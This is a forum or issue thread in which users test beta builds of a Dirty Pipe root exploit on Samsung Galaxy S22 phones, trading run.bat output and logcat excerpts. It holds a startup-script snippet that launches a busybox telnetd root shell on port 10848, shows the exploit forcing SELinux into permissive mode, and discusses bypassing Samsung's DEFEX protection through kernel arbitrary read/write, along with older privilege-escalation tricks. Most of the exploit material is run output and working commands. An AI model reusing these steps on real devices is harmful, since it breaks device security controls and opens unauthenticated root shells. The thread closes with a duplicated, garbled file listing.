[elliwigy]

dirtypipe-android-1.0.3-beta2.zip

Thank you! Try this version and post output of run.bat.

dirtypipe-android: 1 file pushed, 0 skipped. 4.2 MB/s (45296 bytes in 0.010s)
startup-root: 1 file pushed, 0 skipped. 3.7 MB/s (3671 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 68.7 MB/s (2102536 bytes in 0.029s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 59.2 MB/s (672928 bytes in 0.011s)
4 files pushed, 0 skipped. 35.3 MB/s (2824431 bytes in 0.076s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 0
Stage1 debug filename: /dev/.dirtypipe-0000
Shell code size: 344 0x158 bytes
It worked!

[polygraphene]

Did the device reboot? How about adb logcat?

[elliwigy]

second time I ran it it said press any key to continue then crashed but first time through didn't say press any key to continue but didn't crash either

[polygraphene]

That seems good sign.
Run adb shell, then logcat -d | grep modprobe and logcat -d | grep libc

[elliwigy]

logcat.txt
logcat2.txt

[polygraphene]

Seems succeeded. Didn't you get root shell?

03-29 07:47:12.947  5656  5656 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:265): avc:  denied  { search } for  pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:266): avc:  denied  { execute } for  pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:267): avc:  denied  { read open } for  pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered

[elliwigy]

Nope, unless I am doing something wrong.. I double click the run.bat and it runs up to saying "It worked!" then just sits there.. then if I run it a second time it crashes.

[elliwigy]

This time I ran it the first time said it worked then pressed enter and it said press any key to continue then AUTH but the terminal just closed and nothing happened.

[polygraphene]

So, add following 3 lines in startup-root then retry:

HOST=127.0.0.1
PORT=10847

logwrapper echo startup-root ok
logwrapper id
/data/local/tmp/busybox telnetd -l /bin/sh -p 10848 &

export ANDROID_DATA=/data
export ANDROID_ART_ROOT=/apex/com.android.art

Then try /data/local/tmp/busybox telnet 127.0.0.1 10848 on adb shell.
And upload logcat again.

[elliwigy]

logcat3.txt

[elliwigy]

I added the 3 lines and ran the run.bat then adb shell and the telnet command keeps returning connection refused

[polygraphene]

Did you launch run.bat after editing startup-root?

[elliwigy]

Did you launch run.bat after editing startup-root?

Yes lol

[elliwigy]

startup-root.txt

did I edit it right? just remove the .txt file extension

[polygraphene]

Yes. That's right.
I could not find any clue on logcat3.txt. Can you reboot the device and retry?

[polygraphene]

dirtypipe-android-1.0.3-beta3.zip

I added more log and setenforce 0 on startup-root.
Try it. You don't need to edit startup-root.

[elliwigy]

Here is after a reboot with beta2 still.. trying beta3 now..
logcat4.txt

[polygraphene]

No modprobe output on the log. Very strange...

[elliwigy]

dirtypipe-android-1.0.3-beta3.zip

I added more log and setenforce 0 on startup-root. Try it. You don't need to edit startup-root.

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 21.1 MB/s (45296 bytes in 0.002s)
startup-root: 1 file pushed, 0 skipped. 1.5 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 87.2 MB/s (2102536 bytes in 0.023s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 114.6 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 26.5 MB/s (2821955 bytes in 0.102s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 9
Stage1 debug filename: /dev/.dirtypipe-0009
Shell code size: 344 0x158 bytes
It worked!

AUTH
Press any key to continue . . .
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 21.1 MB/s (45296 bytes in 0.002s)
startup-root: 1 file pushed, 0 skipped. 1.5 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 87.2 MB/s (2102536 bytes in 0.023s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 114.6 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 26.5 MB/s (2821955 bytes in 0.102s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 9
Stage1 debug filename: /dev/.dirtypipe-0009
Shell code size: 344 0x158 bytes
It worked!

AUTH
Press any key to continue . . .
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
telnet: can't connect to remote host (127.0.0.1): Connection refused
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> adb shell
b0q:/ $ getenforce
Enforcing
b0q:/ $ exit
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 65.5 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 5.6 MB/s (1195 bytes in 0.000s)
magisk/busybox: 1 file pushed, 0 skipped. 109.9 MB/s (2102536 bytes in 0.018s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 115.6 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 45.0 MB/s (2821955 bytes in 0.060s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: 14012971
Empty space size: 2096 bytes
Run index: 10
Stage1 debug filename: /dev/.dirtypipe-0010
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>
logcat5.txt

[polygraphene]

Could you run it on command prompt? Sometime Powershell do bad things.

[polygraphene]

AUTH message is very strange...
I have never seen that message.

[polygraphene]

I think I only see the logcat of second attempt of run.bat.

[elliwigy]

C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>.\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 29.7 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 1.3 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 118.0 MB/s (2102536 bytes in 0.017s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 106.9 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 24.7 MB/s (2821955 bytes in 0.109s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: 14012971
Empty space size: 2096 bytes
Run index: 12
Stage1 debug filename: /dev/.dirtypipe-0012
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .
C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>.\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 34.6 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 1.7 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 116.2 MB/s (2102536 bytes in 0.017s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 112.1 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 33.7 MB/s (2821955 bytes in 0.080s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 12
Stage1 debug filename: /dev/.dirtypipe-0012
Shell code size: 344 0x158 bytes
It worked!
id
AUTH
Press any key to continue . . .
C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>

[elliwigy]

I think I only see the logcat of second attempt of run.bat.

it was twice.. I run logcat then run.bat then when its done and doesn't do anything I run it again and it crashes.. same output.. @oakieville can you try it on your S22?

[polygraphene]

If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device.
We might need some help from experienced devs.

[polygraphene]

Second run without reboot always fail, because after the first run the libs are not restored properly.
Can you upload logcat when only run once?

[oakieville]

dirtypipe-android: 1 file pushed, 0 skipped. 58.6 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 2.4 MB/s (1195 bytes in 0.000s)
magisk/busybox: 1 file pushed, 0 skipped. 150.3 MB/s (2102536 bytes in 0.013s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 139.8 MB/s (672928 bytes in 0.005s)
4 files pushed, 0 skipped. 1.0 MB/s (2821955 bytes in 2.714s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 5
Stage1 debug filename: /dev/.dirtypipe-0005
Shell code size: 344 0x158 bytes
It worked!

beta 3 stopped there for me

modprobe-payload: Successfully set permissive in logcat

adb shell getenforce
Enforcing
logcatbeta3.txt

[oakieville]

stat: '/dev/.dirtypipe-0005': Permission denied

[polygraphene]

Thanks. There are similar logs as @elliwigy provides:

03-29 09:01:47.097 16957 16957 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:246): avc:  denied  { search } for  pid=16958 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:247): avc:  denied  { execute } for  pid=16958 comm="modprobe" name="startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:248): avc:  denied  { read open } for  pid=16958 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered

According to this log, kernel module was successfully loaded and set permissive.

[polygraphene]

Can you run adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848 on another command prompt, while run.bat prompt untouched?

[oakieville]

telnet: can't connect to remote host (127.0.0.1): Connection refused

however this device is not physically connected to my pc it is shared remotely

not sure if that matters

[oakieville]

Seen permissive in logcat got excited for a minute even with only permissive i beleave i can do my main goal

[polygraphene]

Yep. I think we are nearly in the goal (permissive + root shell).

I built the version to completely set permissive. (getenforce will output Permissive)
dirtypipe-android-1.0.3-beta4.zip
But perhaps still we can't get root shell.

[polygraphene]

I think we are blocked by some security mechanism by samsung.
I will check kernel source after tomorrow.

Thank you for testing for a long time today.

[oakieville]

adb shell getenforce
Permissive
well look at that

[elliwigy]

If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

That said, I am no expert by any means but unfortunately there isnt many devs working on USA/Snap model Samsungs for a while now lol.. Maybe some other devs for other devices can help, there has to be a universal method.. too bad fire30 won't release his methods 🥱

You are pro in my book and appreciate your help.. We are so close and I bet its something simple we are missing I bet.. Is there any other way besides Telnet?

One root method back on S8 days that worked (there were a few exploits I daisy chained) that even chainfire was surprised worked is we had an su binary in system/xbin but couldnt execute it and one day I was messing around and typed "adb shell setsid su" and sure enough it opened a root shell lol.. or another time I used uevent_helper and pushed a script there that was executed by the kernel and installed root for me.. or another I used a qti_init script on param that executed by init when setting a prop value via setprop or even cmdline injection I found that passed properties via bootloader by changing the serialno lol.. point is, there has to be something we can use :-)

[oakieville]

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848

r0q:/ $
connected but not root
it is permissive however

[polygraphene]

If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

Thats' great! Do you have experience about DEFEX?
I have found an explanation for DEFEX.
It possibly prevent our startup-root from executing.
Any idea on how to disable/bypass DEFEX?
We now can execute any code in a kernel module. So, we can modify internal data on DEFEX, I think.

I uploaded kernel code of Galaxy S22.
https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848

r0q:/ $ connected but not root it is permissive however

How did you launched telnetd? from normal (non-root) shell?
If so, it is expected behavior.

[polygraphene]

Can you run dmesg command on adb shell?
Kernel log might help to debug the issue.

[oakieville]

Yes shortly ill run it unfortunately i dont know DEFEX, I do have kernel source downloaded

[oakieville]

If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

Thats' great! Do you have experience about DEFEX? I have found an explanation for DEFEX. It possibly prevent our startup-root from executing. Any idea on how to disable/bypass DEFEX? We now can execute any code in a kernel module. So, we can modify internal data on DEFEX, I think.

I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root it is permissive however

How did you launched telnetd? from normal (non-root) shell? If so, it is expected behavior.

Yes normal shell as no root shell was presented (maybe i did something wrong but seems to ran correctly)

[elliwigy]

If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

Thats' great! Do you have experience about DEFEX? I have found an explanation for DEFEX. It possibly prevent our startup-root from executing. Any idea on how to disable/bypass DEFEX? We now can execute any code in a kernel module. So, we can modify internal data on DEFEX, I think.

I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root it is permissive however

How did you launched telnetd? from normal (non-root) shell? If so, it is expected behavior.

I honestly didn't think they were still using defex but back on Oreo it was a simple hex patch that bypassed it in the kernel.. magisk automatically patches it to my understanding..

maybe can use another location shell has access to such as

/data/user_de/0/com.android.shell/files

Which is the path for /bugreports

Is also where bugreports are created/stored.. Not sure if it's a "safe place" or not by defex standards.. Magisk is sometimes executed from /data/adb which of course need privs to access it

[elliwigy]

Either way, we know its possible since fire30 was able to get a root shell on p6 and s22 devices.. he uses an app however so maybe he gets around it somehow by using the apps directory instead of data/local/tmp? Maybe using termux or something like andronix to run linux within termux can help?

[elliwigy]

If this exploit was blocked by security mechanism like samsung RKP, it is very diffucult to debug the issue remotely. In addition, I have very little experience about samsung device. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8 since we have locked BLs..

Thats' great! Do you have experience about DEFEX? I have found an explanation for DEFEX. It possibly prevent our startup-root from executing. Any idea on how to disable/bypass DEFEX? We now can execute any code in a kernel module. So, we can modify internal data on DEFEX, I think.

I uploaded kernel code of Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root it is permissive however

How did you launched telnetd? from normal (non-root) shell? If so, it is expected behavior.

would we use startup-root to edit code or need to build kernel module to do things?

[polygraphene]

It is possible to (temporarily) bypass DEFEX by utilizing the paths other than /data/local/tmp, but ultimately, kernel solution to completely disable DEFEX is inevitable.
Given that we already have kernel arbitrary rw, the solution will be straightforward like binary patching in kernel module.

Honestly, I'm not interested in bypassing/disabling DEFEX. Because it is samsung specific and I don't have the device.

Why not learn C language and kernel development to complete the work? @elliwigy

[elliwigy]

I do know some C code and def. know kernel development.. Also, I am not sure Defex is the cause as I haven't seen it referenced anywhere in logs for example. So essentially a root shell woulld be nice then I can work on other things but simply don't have the time to learn a new language in detail due to my regular job unfortunately

[elliwigy]

What are all these things?

|b0q:/ $ cd /data/local/tmp
b0q:/data/local/tmp $ ls -al
total 2781total 2781
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\n\ can1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\n:\ can1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\nnt
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\r
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\n\ 
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\n]:\ cant
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\r\nant
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\nt
drwxrwx--x 3 shell shell    3452 2022-03-31 02:36 .
drwxr-x--x 6 root  root     3452 1969-12-31 19:13 ..
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 127
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 :
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1223]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1239]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1347]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1949]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [196]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1984]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [201
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2618]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2619]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2998]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [30
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3174]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3384]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3424]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3790]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4160]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4241]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4244]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4628]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4641
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4771]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4797
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4888]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4964]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4967]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [49871
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5001]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5052]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5170]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5398]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5421]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5462]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5563]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5759]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5919]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6288]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6353]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6460]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6464]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6554]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6564]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6587]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [6619]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [6905]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7191]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7403]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7751
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [8293]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [8319]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\n\ can1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\n:\ can1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\nnt
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\r
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\n\ 
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\n]:\ cant
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\r\nant
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\nt
drwxrwx--x 3 shell shell    3452 2022-03-31 02:36 .
drwxr-x--x 6 root  root     3452 1969-12-31 19:13 ..
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 127
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 :
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1223]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1239]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1347]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1949]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [196]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1984]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [201
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2618]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2619]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2998]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [30
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3174]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3384]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3424]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3790]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4160]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4241]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4244]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4628]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4641
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4771]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4797
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4888]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4964]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4967]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [49871
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5001]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5052]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5170]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5398]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5421]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5462]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5563]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5759]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5919]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6288]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6353]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6460]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6464]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6554]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6564]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6587]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [6619]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [6905]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7191]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7403]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7751
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [8293]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [8319]:

[xcainiao]

I build mymod.ko with s22 kernel. It too large

du -sh mymod.ko
432K

[polygraphene]

What are all these things?

